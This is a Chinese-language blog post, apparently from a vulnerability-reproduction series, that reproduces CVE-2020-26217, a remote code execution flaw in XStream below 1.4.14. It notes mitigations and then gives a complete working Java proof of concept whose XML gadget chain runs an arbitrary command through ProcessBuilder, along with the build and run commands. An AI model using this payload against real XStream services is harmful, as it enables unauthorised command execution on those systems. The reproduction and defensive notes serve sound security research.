【漏洞复现】CVE-2020-26217 | XStream远程代码执行漏洞

写在前面

影响范围为XStream < 1.4.14,小版本也需要加黑名单,但是复现过程中只有所有常规版本和下图红标小版本复现成功:

另外还需要XPP3、xmlpull这两个jar包,JDK9无法触发成功。
复现过程中发现1.4.10及以上版本通过在使用fromXML方法前开启默认安全配置:

XStream xStream = new XStream();
XStream.setupDefaultSecurity(xStream);    #开启默认安全配置
String xml = ""
xStream.fromXML(xml);

来完成漏洞规避,经测试无法触发漏洞,无需升级到1.4.14。
当然通过补充本次被绕过的黑名单:javax.imageio.ImageIO$ContainsFilter 也可以进行临时防护,可参考官方说明中的Workaround部分:http://x-stream.github.io/CVE-2020-26217.html

准备环境

1.XStream Core
<!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream -->
<dependency>
    <groupId>com.thoughtworks.xstream</groupId>
    <artifactId>xstream</artifactId>
    <version>1.4.9</version>
</dependency>

2.XPP3
<!-- https://mvnrepository.com/artifact/org.ogce/xpp3 -->
<dependency>
    <groupId>org.ogce</groupId>
    <artifactId>xpp3</artifactId>
    <version>1.1.6</version>
</dependency>
3.xmlpull
<!-- https://mvnrepository.com/artifact/xmlpull/xmlpull -->
<dependency>
    <groupId>xmlpull</groupId>
    <artifactId>xmlpull</artifactId>
    <version>1.1.3.1</version>
</dependency>

根据官方说明编写测试POC:

import com.thoughtworks.xstream.XStream;
public class vultest {
	public static void main(String[] args) {
		XStream xStream = new XStream();
		//XStream.setupDefaultSecurity(xStream);
		String xml = "<map>\n" +
				"  <entry>\n" +
				"    <jdk.nashorn.internal.objects.NativeString>\n" +
				"      <flags>0</flags>\n" +
				"      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
				"        <dataHandler>\n" +
				"          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
				"            <contentType>text/plain</contentType>\n" +
				"            <is class='java.io.SequenceInputStream'>\n" +
				"              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
				"                <iterator class='javax.imageio.spi.FilterIterator'>\n" +
				"                  <iter class='java.util.ArrayList$Itr'>\n" +
				"                    <cursor>0</cursor>\n" +
				"                    <lastRet>-1</lastRet>\n" +
				"                    <expectedModCount>1</expectedModCount>\n" +
				"                    <outer-class>\n" +
				"                      <java.lang.ProcessBuilder>\n" +
				"                        <command>\n" +
				"                          <string>calc</string>\n" +                  #修改此处string来调用ProcessBuilder执行命令,此处以calc为例
				"                        </command>\n" +
				"                      </java.lang.ProcessBuilder>\n" +
				"                    </outer-class>\n" +
				"                  </iter>\n" +
				"                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" +
				"                    <method>\n" +
				"                      <class>java.lang.ProcessBuilder</class>\n" +
				"                      <name>start</name>\n" +
				"                      <parameter-types/>\n" +
				"                    </method>\n" +
				"                    <name>start</name>\n" +
				"                  </filter>\n" +
				"                  <next/>\n" +
				"                </iterator>\n" +
				"                <type>KEYS</type>\n" +
				"              </e>\n" +
				"              <in class='java.io.ByteArrayInputStream'>\n" +
				"                <buf></buf>\n" +
				"                <pos>0</pos>\n" +
				"                <mark>0</mark>\n" +
				"                <count>0</count>\n" +
				"              </in>\n" +
				"            </is>\n" +
				"            <consumed>false</consumed>\n" +
				"          </dataSource>\n" +
				"          <transferFlavors/>\n" +
				"        </dataHandler>\n" +
				"        <dataLen>0</dataLen>\n" +
				"      </value>\n" +
				"    </jdk.nashorn.internal.objects.NativeString>\n" +
				"    <string>test</string>\n" +
				"  </entry>\n" +
				"</map>";
		//final Iterator<?> iterator = (Iterator<?>) xStream.fromXML(xml);
		//iterator.hasNext();
		xStream.fromXML(xml);
	}

}

漏洞复现

1.编译上述poc:
javac -cp xstream-1.4.13.jar vultest.java
2.运行验证:
"C:\Program Files\Java\jre1.8.0_231\bin\java.exe" -classpath .;xstream-1.4.13.jar;xmlpull-1.1.3.1.jar;xpp3-1.1.6.jar vultest #JDK9测试无法触发,1.8可以,故使用1.8来验证

参考

[1]https://x-stream.github.io/CVE-2020-26217.html

posted @ 2020-11-18 15:33  303donatello  阅读(1775)  评论(0编辑  收藏  举报